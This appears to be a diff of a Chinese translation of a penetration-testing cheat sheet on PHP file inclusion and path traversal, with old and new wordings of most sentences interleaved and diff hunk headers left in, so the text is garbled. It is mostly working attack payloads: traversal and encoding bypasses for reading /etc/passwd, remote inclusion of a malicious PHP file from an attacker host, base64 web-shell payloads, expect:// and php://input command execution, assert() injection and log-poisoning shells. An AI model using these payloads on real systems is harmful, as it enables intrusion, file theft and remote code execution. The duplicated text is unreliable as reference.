尝试删除 `C:/` 并添加 `../../../../../`
可以在[这里](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)找到一个使用多种技术来查找文件 /boot.ini以检查漏洞是否存在的列表
一个使用多种技术查找文件 /boot.ini以检查漏洞是否存在的列表可以在 [这里](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt) 找到。
### **OS X**
Linux 的 LFI 列表。
查 Linux 的 LFI 列表。
## 基本 LFI 和绕过
所有示例都是关于本地文件包含,但也可以应用于远程文件包含(例如页面=[http://myserver.com/phpshellcode.txt\\](http://myserver.com/phpshellcode.txt\)/)。
所有示例都是针对本地文件包含,但也可以应用于远程文件包含(页面=[http://myserver.com/phpshellcode.txt\\](http://myserver.com/phpshellcode.txt\)/)。
```
http://example.com/index.php?page=../../../etc/passwd
```
@ -84,22 +85,22 @@ http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
```
### **空字节 (%00)**
绕过在提供的字符串末尾附加更多字符(绕过方式$\_GET\['param']."php"
绕过在提供的字符串末尾附加更多字符的限制(绕过:$\_GET\['param']."php"
```
http://example.com/index.php?page=../../../etc/passwd%00
```
个问题**自 PHP 5.4 起已解决**
**自 PHP 5.4 起已解决**
### **编码**
您可以使用非标准编码,如双重 URL 编码(等等):
您可以使用非标准编码,例如双重 URL 编码(和其他编码):
```
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
### 从现有文件夹
### 从现有文件夹
也许后端正在检查文件夹路径:
```python
@ -107,36 +108,36 @@ http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
### 探索服务器上的文件系统目录
可以通过使用特定技术递归地探索服务器的文件系统,以识别目录而不仅仅是文件。该过程涉及确定目录深度并探测特定文件夹的存在。以下是实现此目的的详细方法:
服务器的文件系统可以通过某些技术递归地探索,以识别目录,而不仅仅是文件。此过程涉及确定目录深度并探测特定文件夹的存在。以下是实现此目的的详细方法:
1. **确定目录深度:** 通过成功获取 `/etc/passwd` 文件如果服务器基于Linux来确定当前目录的深度。例如URL 可能被构建如下,指示深度为三:
1. **确定目录深度:** 通过成功获取 `/etc/passwd` 文件来确定当前目录的深度适用于基于Linux的服务器。一个示例URL可能结构如下示深度为三:
```bash
http://example.com/index.php?page=../../../etc/passwd # depth of 3
```
2. **探测文件夹:** 将疑文件夹的名称(例如,`private`附加到URL然后导航回 `/etc/passwd`。额外的目录级别需要将深度增加一
2. **探测文件夹:**疑文件夹的名称(例如,`private`)附加到 URL然后导航回 `/etc/passwd`。额外的目录级别需要将深度增加一
```bash
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
```
3. **解释结果:** 服务器的响应指示文件夹是否存在:
* **错误 / 无输出:** 文件夹 `private` 可能不存指定位置。
* **`/etc/passwd` 的内容:** 确认了 `private` 文件夹的存在
4. **递归探索:** 可以进一步探查已发现的文件夹以查找子目录或文件使用相同的技术或传统的本地文件包含LFI方法
* **错误 / 无输出:** 文件夹 `private` 可能在指定位置不存在
* **`/etc/passwd` 的内容:** 确认存在 `private` 文件夹
4. **递归探索:** 发现的文件夹可以使用相同的技术或传统的本地文件包含 (LFI) 方法进一步探测子目录或文件
在文件系统中不同位置探索目录,请相应调整有效载荷。例如,要检查 `/var/www/` 是否包含一个 `private` 目录(假设当前目录深度为 3请使用
探索文件系统中不同位置的目录,请相应调整有效负载。例如,要检查 `/var/www/` 是否包含 `private` 目录(假设当前目录深度为 3请使用
```bash
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```
### **路径截断技术**
路径截断是一种用于操纵Web应用程序中文件路径的方法。它经常被用来访问受限文件,通过绕过某些安全措施,在文件路径末尾附加额外字符。其目标是构建一个文件路径,一旦被安全措施修改,仍然指向所需文件。
路径截断是一种用于操纵Web应用程序中文件路径的方法。它通常用于通过绕过某些安全措施来访问受限文件,这些安全措施会在文件路径的末尾附加额外字符。目标是构造一个文件路径,该路径在被安全措施修改后,仍然指向所需的文件。
在PHP中由于文件系统的特性文件路径的各种表示形式被视为等效。例如:
在PHP中由于文件系统的特性文件路径的各种表示可以被视为等效。例如:
* `/etc/passwd`、`/etc//passwd`、`/etc/./passwd` `/etc/passwd/` 都被视为相同路径。
* 当最后6个字符是 `passwd` 时,附加 `/`(变成 `passwd/`)不会改变目标文件。
* 同样,如果向文件路径附加 `.php`(如 `shellcode.php`),在末尾添加 `/.` 不会改变所访问的文件。
* `/etc/passwd`、`/etc//passwd`、`/etc/./passwd`和`/etc/passwd/`都被视为相同路径。
* 当最后6个字符是`passwd`时,附加一个`/`(使其变为`passwd/`)不会改变目标文件。
* 同样,如果在文件路径后附加`.php`(如`shellcode.php`),在末尾添加`/.`不会改变被访问的文件。
提供的示例演示了如何利用路径截断来访问 `/etc/passwd`,这是一个常见目标,因为其中包含敏感内容(用户帐户信息)
提供的示例演示了如何利用路径截断访问`/etc/passwd`,这是一个由于其敏感内容(用户账户信息)而常见的目标
```
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
@ -146,17 +147,17 @@ http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
```
在这些情况下可能需要大约2027个遍历但这个数字可能会根据服务器的配置而变化
在这些场景中所需的遍历次数可能在2027左右但这个数字可能会根据服务器的配置而有所不同
* **使用点段和额外字符**:遍历序列(`../`)与额外的点段和字符结合在一起,可以用来导航文件系统,有效地忽略服务器附加的字符串。
* **确定所需的遍历次数**:通过试错,可以找到导航到根目录然后到`/etc/passwd`所需的精确数量的`../`序列,确保任何附加的字符串(如`.php`)被中和,但所需的路径(`/etc/passwd`)保持完整
* **从一个虚假目录开始**:常见做法是以一个不存在的目录(如`a/`)开始路径。这种技术被用作一种预防措施或满足服务器路径解析逻辑的要求。
* **使用点段和附加字符**:遍历序列(`../`)与额外的点段和字符结合使用,可以用来导航文件系统,有效地忽略服务器附加的字符串。
* **确定所需的遍历次数**:通过反复试验,可以找到导航到根目录然后到`/etc/passwd`所需的精确`../`序列数量,确保任何附加的字符串(如`.php`)被中和,但所需的路径(`/etc/passwd`)保持不变
* **从虚假目录开始**:通常的做法是以一个不存在的目录(如`a/`)开始路径。这种技术作为预防措施或满足服务器路径解析逻辑的要求。
在使用路径截断技术时,了解服务器的路径解析行为和文件系统结构至关重要。每种情况可能需要不同的方法,通常需要测试来找到最有效的方法
在使用路径截断技术时,了解服务器的路径解析行为和文件系统结构至关重要。每种情况可能需要不同的方法,通常需要测试以找到最有效的方式
**此漏洞已在PHP 5.3中得到修复。**
**此漏洞在PHP 5.3中已被修复。**
### **绕过过滤器的技巧**
### **过滤器绕过技巧**
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
@ -166,22 +167,26 @@ http://example.com/index.php?page=PhP://filter
```
## 远程文件包含
php 中,默认情况下会禁用这个功能,因为 **`allow_url_include`** 是 **Off.** 它必须是 **On** 才能正常工作,在这种情况下,您可以包含来自您服务器上的 PHP 文件并获得 RCE:
php中这默认是禁用的因为 **`allow_url_include`** 是 **关闭** 的。它必须是 **开启** 的才能工作在这种情况下你可以从你的服务器包含一个PHP文件并获得RCE
```python
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
```
如果由于某种原因**`allow_url_include`**被设置为**On**但PHP正在**过滤**对外部网页的访问,[根据这篇文章](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/)你可以使用数据协议与base64来解码一个b64 PHP代码并获得RCE
如果由于某种原因 **`allow_url_include`** 是 **开启** 的,但 PHP 正在 **过滤** 对外部网页的访问,[根据这篇文章](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/),你可以使用例如数据协议和 base64 来解码一个 b64 PHP 代码并获得 RCE
{% code overflow="wrap" %}
```
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
```
{% endcode %}
{% hint style="info" %}
上面的代码中,最后添加 `+.txt` 是因为攻击者需要一个以 `.txt` 结尾的字符串,因此字符串以它结尾,在经过 base64 解码后,该部分将只返回垃圾内容,而真正的 PHP 代码将被包含(因此被执行)。
之前的代码中,最后的 `+.txt` 被添加是因为攻击者需要一个以 `.txt` 结尾的字符串,因此字符串以它结尾,并且在 b64 解码后那部分将返回垃圾数据,真正的 PHP 代码将被包含(因此被执行)。
{% endhint %}
另一个示例**不使用 `php://` 协议**的例子是:
另一个**不使用 `php://` 协议**的例子是:
{% code overflow="wrap" %}
```
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
```
@ -189,27 +194,27 @@ data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9
## Python 根元素
Python 中,像下面这样的代码:
python 中,像这样的代码:
```python
# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)
```
如果用户传递了**绝对路径**到**`file_name`**,则**先前的路径将被移除**
如果用户传递一个 **绝对路径****`file_name`****之前的路径会被移除**
```python
os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
```
根据[文档](https://docs.python.org/3.10/library/os.path.html#os.path.join),这是预期行为:
根据[文档](https://docs.python.org/3.10/library/os.path.html#os.path.join),这是预期行为:
> 如果组件是绝对路径,则所有先前的组件都将被丢弃,并且连接将从绝对路径组件继续
> 如果一个组件是绝对路径,则所有先前的组件都会被丢弃,并从绝对路径组件继续连接
## Java列出目录
## Java 列出目录
看起来如果在Java中存在路径遍历并且您**请求一个目录**而不是一个文件,则会返回**目录的列表**。这在其他语言中不会发生(据我所知)
看起来如果你在 Java 中有路径遍历并且你**请求一个目录**而不是文件,**将返回该目录的列表**。在其他语言中(据我所知)不会发生这种情况
## 前25个参数
以下是可能容易受到本地文件包含LFI漏洞影响的前25个参数列表来自[链接](https://twitter.com/trbughunters/status/1279768631845494787):
以下是可能容易受到本地文件包含LFI漏洞影响的前25个参数列表来自[链接](https://twitter.com/trbughunters/status/1279768631845494787)
```
?cat={payload}
?dir={payload}
@ -237,39 +242,39 @@ os.path.join(os.getcwd(), "public", "/etc/passwd")
?mod={payload}
?conf={payload}
```
## 使用 PHP 包装器和协议的 LFI / RFI
## LFI / RFI 使用 PHP 包装器和协议
### php://filter
PHP 过滤器允许在数据被读取或写入之前执行基本的**修改操作**。有 5 类过滤器
PHP 过滤器允许在数据被读取或写入之前执行基本的 **修改操作**。过滤器分为 5 类
* [字符串过滤器](https://www.php.net/manual/en/filters.string.php):
* `string.rot13`
* `string.toupper`
* `string.tolower`
* `string.strip_tags`: 从数据中删除标签(位于 "<" 和 ">" 字符之间的所有内容)
* 请注意,此过滤器已经在现代版本的 PHP 中消失
* `string.strip_tags`: 从数据中移除标签(在 "<" 和 ">" 字符之间的所有内容)
* 请注意,这个过滤器在现代版本的 PHP 中已经消失
* [转换过滤器](https://www.php.net/manual/en/filters.convert.php)
* `convert.base64-encode`
* `convert.base64-decode`
* `convert.quoted-printable-encode`
* `convert.quoted-printable-decode`
* `convert.iconv.*`:转换为不同的编码(`convert.iconv.<input_enc>.<output_enc>`)。要获取支持的**所有编码列表**,请在控制台中运行:`iconv -l`
* `convert.iconv.*` : 转换为不同的编码(`convert.iconv.<input_enc>.<output_enc>`)。要获取 **所有支持的编码列表**,请在控制台运行:`iconv -l`
{% hint style="warning" %}
滥用 `convert.iconv.*` 转换过滤器,您可以**生成任意文本**,这可能对编写任意文本或执行包含过程中的任意文本很有用。有关更多信息,请查看 [**通过 php 过滤器进行 LFI2RCE**](lfi2rce-via-php-filters.md)。
滥用 `convert.iconv.*` 转换过滤器可以 **生成任意文本**,这可能对写入任意文本或使函数如包含过程处理任意文本有用。有关更多信息,请查看 [**通过 php 过滤器的 LFI2RCE**](lfi2rce-via-php-filters.md)。
{% endhint %}
* [压缩过滤器](https://www.php.net/manual/en/filters.compression.php)
* `zlib.deflate`: 压缩内容(如果需要外泄大量信息,则很有用)
* `zlib.deflate`: 压缩内容(在提取大量信息时很有用)
* `zlib.inflate`: 解压数据
* [加密过滤器](https://www.php.net/manual/en/filters.encryption.php)
* `mcrypt.*`已弃用
* `mdecrypt.*`已弃用
* `mcrypt.*` : 已弃用
* `mdecrypt.*` : 已弃用
* 其他过滤器
* 在 php 中运行 `var_dump(stream_get_filters());`,您可以找到一些**意外的过滤器**
* 在 php 中运行 `var_dump(stream_get_filters());` 可以找到几个 **意外的过滤器**
* `consumed`
* `dechunk`反转 HTTP 分块编码
* `dechunk`: 反转 HTTP 分块编码
* `convert.*`
```php
# String Filters
@ -298,40 +303,40 @@ readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)
```
{% hint style="warning" %}
部分 "php://filter" 不区分大小写
部分 "php://filter" 不区分大小写
{% endhint %}
### 使用php过滤器作为读取任意文件的预言者
### 使用 php 过滤器作为 oracle 读取任意文件
[**在这篇文章中**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle)提出了一种在没有从服务器返回输出的情况下读取本地文件的技术。这种技术基于**使用php过滤器作为预言者逐个字符地提取文件**。这是因为php过滤器可以用来使文本变得足够大以至于使php抛出异常。
[**在这篇文章中**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) 提出了一种在不从服务器返回输出的情况下读取本地文件的技术。该技术基于 **使用 php 过滤器作为 oracle 的文件布尔外泄(逐字符)**。这是因为 php 过滤器可以用来使文本变得足够大,从而使 php 抛出异常。
在原始文章中,您可以找到该技术的详细解释,但这里是一个快速摘要
在原始文章中可以找到该技术的详细解释,但这里是一个快速总结
- 使用编解码器**`UCS-4LE`**将文本的前导字符留在开头,并使字符串的大小呈指数增长。
- 这将用于生成一个**当猜测正确的初始字母时非常大的文本**以便php触发一个**错误**
- **dechunk**过滤器将**删除所有内容,如果第一个字符不是十六进制**,因此我们可以知道第一个字符是否是十六进制。
- 这与先前的过滤器结合使用以及根据猜测的字母使用其他过滤器将允许我们通过查看我们进行足够的转换使其不再是十六进制字符来猜测文本开头的一个字母。因为如果是十六进制dechunk不会删除它初始炸弹将使php出错
- 编解码器**convert.iconv.UNICODE.CP930**将每个字母转换为下一个字母因此在此编解码器之后a -> b。这使我们可以发现第一个字母是否是`a`例如因为如果我们应用6次这个编解码器 a->b->c->d->e->f->g那么这个字母不再是十六进制字符因此dechunk不会删除它php错误会被触发因为它会与初始炸弹相乘。
- 使用其他转换如**rot13**在开头可以泄漏其他字符如n、o、p、q、r还可以使用其他编解码器将其他字母移动到十六进制范围)。
- 当初始字符是一个数字时需要对其进行base64编码并泄漏前两个字母以泄漏这个数字。
- 最终的问题是看如何泄漏**不止初始字母**。通过使用顺序记忆过滤器如**convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE**,可以改变字符的顺序,并在文本的第一个位置得到其他字母。
- 为了能够获取**更多数据**,想法是在开头**生成2字节的无用数据**,然后使用**convert.iconv.UTF16.UTF16**,应用**UCS-4LE**使其**与接下来的2字节对齐**,并**删除数据直到无用数据**这将删除初始文本的前2字节。继续这样做直到达到要泄漏的位。
* 使用编码 **`UCS-4LE`** 将文本的前导字符留在开头,并使字符串的大小呈指数增长。
* 这将用于生成一个 **当初始字母正确猜测时非常大的文本**,以至于 php 会触发一个 **错误**
* **dechunk** 过滤器将 **删除所有内容,如果第一个字符不是十六进制**,因此我们可以知道第一个字符是否是十六进制。
* 这与前一个以及其他根据猜测字母的过滤器结合将允许我们通过查看何时进行足够的转换使其不再是十六进制字符来猜测文本开头的字母。因为如果是十六进制dechunk 不会删除它,初始炸弹将导致 php 错误
* 编码 **convert.iconv.UNICODE.CP930** 将每个字母转换为下一个字母因此在此编码后a -> b。这使我们能够发现第一个字母是否是 `a`,例如,因为如果我们应用 6 次此编码 a->b->c->d->e->f->g该字母不再是十六进制字符因此 dechunk 不会删除它php 错误被触发,因为它与初始炸弹相乘。
* 在开头使用其他转换如 **rot13** 可以泄露其他字符如 n, o, p, q, r其他编码可以用于将其他字母移动到十六进制范围)。
* 当初始字符是数字时,需要对其进行 base64 编码,并泄露前两个字母以泄露该数字。
* 最后一个问题是查看 **如何泄露超过初始字母**。通过使用顺序内存过滤器如 **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** 可以改变字符的顺序,并在文本的第一位置获取其他字母。
* 为了能够获取 **更多数据**,想法是 **在开头生成 2 字节的垃圾数据**,使用 **convert.iconv.UTF16.UTF16**,应用 **UCS-4LE** 使其 **与接下来的 2 字节进行枢轴**,并 **删除数据直到垃圾数据**(这将删除初始文本的前 2 字节)。继续这样做,直到达到所需的泄露位。
在文章中还泄漏了一个自动执行此操作的工具:[php\_filters\_chain\_oracle\_exploit](https://github.com/synacktiv/php\_filter\_chains\_oracle\_exploit)。
在文章中还泄露了一种自动执行此操作的工具:[php\_filters\_chain\_oracle\_exploit](https://github.com/synacktiv/php\_filter\_chains\_oracle\_exploit)。
### php://fd
此包装器允许访问进程打开的文件描述符。可能有用以外泄打开文件的内容
此包装器允许访问进程打开的文件描述符。可能对外泄打开文件的内容有用
```php
echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");
```
你也可以使用 **php://stdin, php://stdout 和 php://stderr** 分别访问 **文件描述符 0, 1 和 2**(不确定这在攻击中如何有用)
您还可以使用 **php://stdin, php://stdout 和 php://stderr** 分别访问 **文件描述符 0, 1 和 2**(不确定这在攻击中如何有用)
### zip:// 和 rar://
上传一个包含 PHPShell 的 Zip 或 Rar 文件并访问它。\
为了能够滥用 rar 协议,**需要专门激活**
为了能够利用 rar 协议,它 **需要被特别激活**
```bash
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
@ -347,8 +352,6 @@ rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php
```
### data://
data://伪协议可用于将数据直接嵌入到网页中。这种技术通常用于在网页中嵌入图像或其他资源,而无需从外部服务器加载。
```
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
@ -358,24 +361,24 @@ http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
注意,此协议受 php 配置 **`allow_url_open`** 和 **`allow_url_include`** 限制
注意,此协议受 php 配置 **`allow_url_open`** 和 **`allow_url_include`** 限制
### expect://
Expect 必须被激活。您可以使用以下方式执行代码:
必须激活 Expect。您可以使用以下方式执行代码
```
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
```
### 输入://
### input://
POST 参数中指定您的有效载荷:
POST参数中指定你的有效载荷:
```bash
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"
```
### phar://
一个 web 应用程序利用 `include` 函数进行文件加载时,可以利用 `.phar` 文件来执行 PHP 代码。下面提供的 PHP 代码片段演示了如何创建一个 `.phar` 文件:
一个 `.phar` 文件可以在 web 应用程序利用 `include` 函数进行文件加载时执行 PHP 代码。下面提供的 PHP 代码片段演示了如何创建一个 `.phar` 文件:
```php
<?php
$phar = new Phar('test.phar');
@ -384,17 +387,17 @@ $phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();
```
要编译`.phar`文件,请执行以下命令:
要编译 `.phar` 文件,应执行以下命令:
```bash
php --define phar.readonly=0 create_path.php
```
在执行时,将创建一个名为 `test.phar` 的文件,可能被利用来利用本地文件包含LFI漏洞。
在执行时,将创建一个名为 `test.phar` 的文件,可能被利用来利用本地文件包含LFI漏洞。
在仅执行文件读取而不执行其中的 PHP 代码的 LFI 情况下,可以尝试利用反序列化漏洞。此漏洞与使用 `phar` 协议读取文件关。
LFI 仅执行文件读取而不执行 PHP 代码的情况下,通过 `file_get_contents()`、`fopen()`、`file()`、`file_exists()`、`md5_file()`、`filemtime()` 或 `filesize()` 等函数,可以尝试利用反序列化漏洞。此漏洞与使用 `phar` 协议读取文件关。
有关在 `.phar` 文件上下文中利用反序列化漏洞的详细理解,请参考下面链接的文档:
有关在 `.phar` 文件上下文中利用反序列化漏洞的详细理解,请参阅以下链接的文档:
[Phar 反序列化利用指南](phar-deserialization.md)
[Phar Deserialization Exploitation Guide](phar-deserialization.md)
{% content-ref url="phar-deserialization.md" %}
[phar-deserialization.md](phar-deserialization.md)
@ -402,69 +405,69 @@ php --define phar.readonly=0 create_path.php
### CVE-2024-2961
可以滥用**支持 php 过滤器的 PHP 读取的任意文件**以获得 RCE。详细描述可以在[**此文章中找到**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**。**\
非常简要的总结:滥用 PHP 堆中的**3字节溢出**以**更改特定大小的空闲块链**,以便能够**在任何地址写入任何内容**,因此添加了一个钩子来调用**`system`**。\
可以通过滥用更多 php 过滤器来分配特定大小的块。
可以滥用 **任何支持 php 过滤器的 PHP 中的任意文件读取** 来获得 RCE。详细描述可以在 [**此帖子中找到**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**。**\
非常简要的总结:在 PHP 堆中滥用 **3 字节溢出****更改特定大小的空闲块链**,以便能够 **在任何地址写入任何内容**,因此添加了一个钩子来调用 **`system`**。\
可以通过滥用更多 php 过滤器来分配特定大小的块。
### 更多协议
检查更多可能的[**要包含的协议**](https://www.php.net/manual/en/wrappers.php)**:**
查看更多可能的 [**协议以包含在这里**](https://www.php.net/manual/en/wrappers.php)****
* [php://memory 和 php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — 写入内存或临时文件(不确定这在文件包含攻击中如何有用)
* [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — 在内存或临时文件中写入(不确定这在文件包含攻击中如何有用)
* [file://](https://www.php.net/manual/en/wrappers.file.php) — 访问本地文件系统
* [http://](https://www.php.net/manual/en/wrappers.http.php) — 访问 HTTP(s) URL
* [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — 访问 FTP(s) URL
* [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — 压缩流
* [glob://](https://www.php.net/manual/en/wrappers.glob.php) — 查找与模式匹配的路径名(不返回任何可打印内容,因此在这里并不真正有用)
* [glob://](https://www.php.net/manual/en/wrappers.glob.php) — 查找匹配模式的路径名(它不返回任何可打印的内容,因此在这里并不真正有用)
* [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — 安全外壳 2
* [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — 音频流(不适用于读取任意文件)
* [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — 音频流(不适读取任意文件)
## 通过 PHP 的 'assert' 进行 LFI
在处理 'assert' 函数时PHP 中的本地文件包含LFI风险特别高,该函数可以执行字符串中的代码。如果输入包含类似 ".." 的目录遍历字符但未经适当消毒,则这将特别成为问题。
在处理 'assert' 函数时PHP 中的本地文件包含LFI风险显著较高,因为它可以执行字符串中的代码。如果输入包含目录遍历字符如 ".." 被检查但未正确清理,这尤其成问题。
例如PHP 代码可能被设计为防止目录遍历,如下所示:
```bash
assert("strpos('$file', '..') === false") or die("");
```
虽然这旨在阻止遍历,但无意中为代码注入创造了一个向量。要利用此漏洞读取文件内容,攻击者可以使用:
虽然这旨在阻止遍历,但不经意间创建了代码注入的向量。为了利用这一点读取文件内容,攻击者可以使用:
```plaintext
' and die(highlight_file('/etc/passwd')) or '
```
同样,执行任意系统命令,可以使用:
同样,对于执行任意系统命令,可以使用:
```plaintext
' and die(system("id")) or '
```
在**URL编码这些有效载荷**非常重要
重要的是要**对这些有效载荷进行URL编码**
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
**黑客洞察**\
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
随时了解最新的赏金任务发布和重要平台更新
了解最新的漏洞赏金发布和重要平台更新
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**今天就加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作!
## PHP盲路径遍历
## PHP盲路径遍历
{% hint style="warning" %}
这种技术在你**控制**将**访问文件**的**PHP函数**的**文件路径**但不会看到文件内容(比如简单调用**`file()`**)且内容不显示的情况下很相关
此技术适用于您**控制**一个**PHP函数**的**文件路径**的情况,该函数将**访问一个文件**但您看不到文件的内容(如简单调用**`file()`**)但内容未显示
{% endhint %}
[**这篇令人难以置信的文章**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)中解释了如何通过PHP过滤器滥用盲目路径遍历来**通过错误神谕提取文件内容**。
[**这篇精彩的文章**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) 中解释了如何通过PHP过滤器滥用盲路径遍历以**通过错误oracle提取文件内容**。
简而言之,该技术使用**“UCS-4LE”编码**使文件内容变得如此**庞大**,以至于**打开文件**PHP函数将触发一个**错误**。
总之,该技术使用**"UCS-4LE"编码**使文件内容变得如此**庞大**,以至于**打开**该文件**PHP函数**将触发一个**错误**。
然后,为了泄露第一个字符,使用过滤器**`dechunk`**以及其他过滤器如**base64**或**rot13**,最后使用过滤器**convert.iconv.UCS-4.UCS-4LE**和**convert.iconv.UTF16.UTF-16BE**来**放置其他字符在开头并泄露它们**。
然后,为了泄露第一个字符,使用过滤器**`dechunk`**以及其他如**base64**或**rot13**,最后使用过滤器**convert.iconv.UCS-4.UCS-4LE**和**convert.iconv.UTF16.UTF-16BE**来**在开头放置其他字符并泄露它们**。
**可能受到影响的函数**`file_get_contents`、`readfile`、`finfo->file`、`getimagesize`、`md5_file`、`sha1_file`、`hash_file`、`file`、`parse_ini_file`、`copy`、`file_put_contents仅目标只读`、`stream_get_contents`、`fgets`、`fread`、`fgetc`、`fgetcsv`、`fpassthru`、`fputs`
**可能存在漏洞的函数**`file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (仅限目标只读)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
有关技术细节,请查看上述文章!
@ -472,19 +475,19 @@ assert("strpos('$file', '..') === false") or die("");
### 远程文件包含
之前已经解释过,[**请查看此链接**](./#remote-file-inclusion)。
如前所述,[**请点击此链接**](./#remote-file-inclusion)。
### 通过Apache/Nginx日志文件
如果Apache或Nginx服务器**易受LFI**在包含函数内部,您可以尝试访问**`/var/log/apache2/access.log`或`/var/log/nginx/access.log`**,在**用户代理**或**GET参数**中设置一个**`<?php system($_GET['c']); ?>`**的php shell并包含该文件
如果Apache或Nginx服务器在包含函数中**易受LFI攻击**,您可以尝试访问**`/var/log/apache2/access.log`或`/var/log/nginx/access.log`**,在**用户代理**或**GET参数**中设置一个php shell**`<?php system($_GET['c']); ?>`**并包含该文件
{% hint style="warning" %}
请注意,**如果您使用双引号**而不是**单引号**来包含shell双引号将被修改为字符串“_**quote;**_”**PHP会在那里抛出错误****不会执行其他任何操作**。
请注意,**如果您使用双引号**而不是**单引号**来编写shell双引号将被修改为字符串"_**quote;**_"**PHP将在此处抛出错误**,并且**不会执行其他任何内容**。
此外,请确保**正确编写有效载荷**否则每次尝试加载日志文件时PHP都会出错您将没有第二次机会。
此外,请确保**正确编写有效载荷**否则每次尝试加载日志文件时PHP都会出错您将没有第二次机会。
{% endhint %}
这也可以在其他日志中完成,但**要小心**日志中的代码可能已进行URL编码这可能会破坏Shell。标题**授权“基本”**包含Base64中的“用户密码”并在日志中解码。PHPShell可以插入此标题内。\
这也可以在其他日志中完成,但**请小心,**日志中的代码可能会被URL编码这可能会破坏Shell。头部**授权 "basic"**包含"用户:密码"的Base64编码并在日志中解码。PHPShell可以插入到此头部中。\
其他可能的日志路径:
```python
/var/log/apache2/access.log
@ -497,142 +500,183 @@ assert("strpos('$file', '..') === false") or die("");
/var/log/nginx/error.log
/var/log/httpd/error_log
```
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
### 通过电子邮件
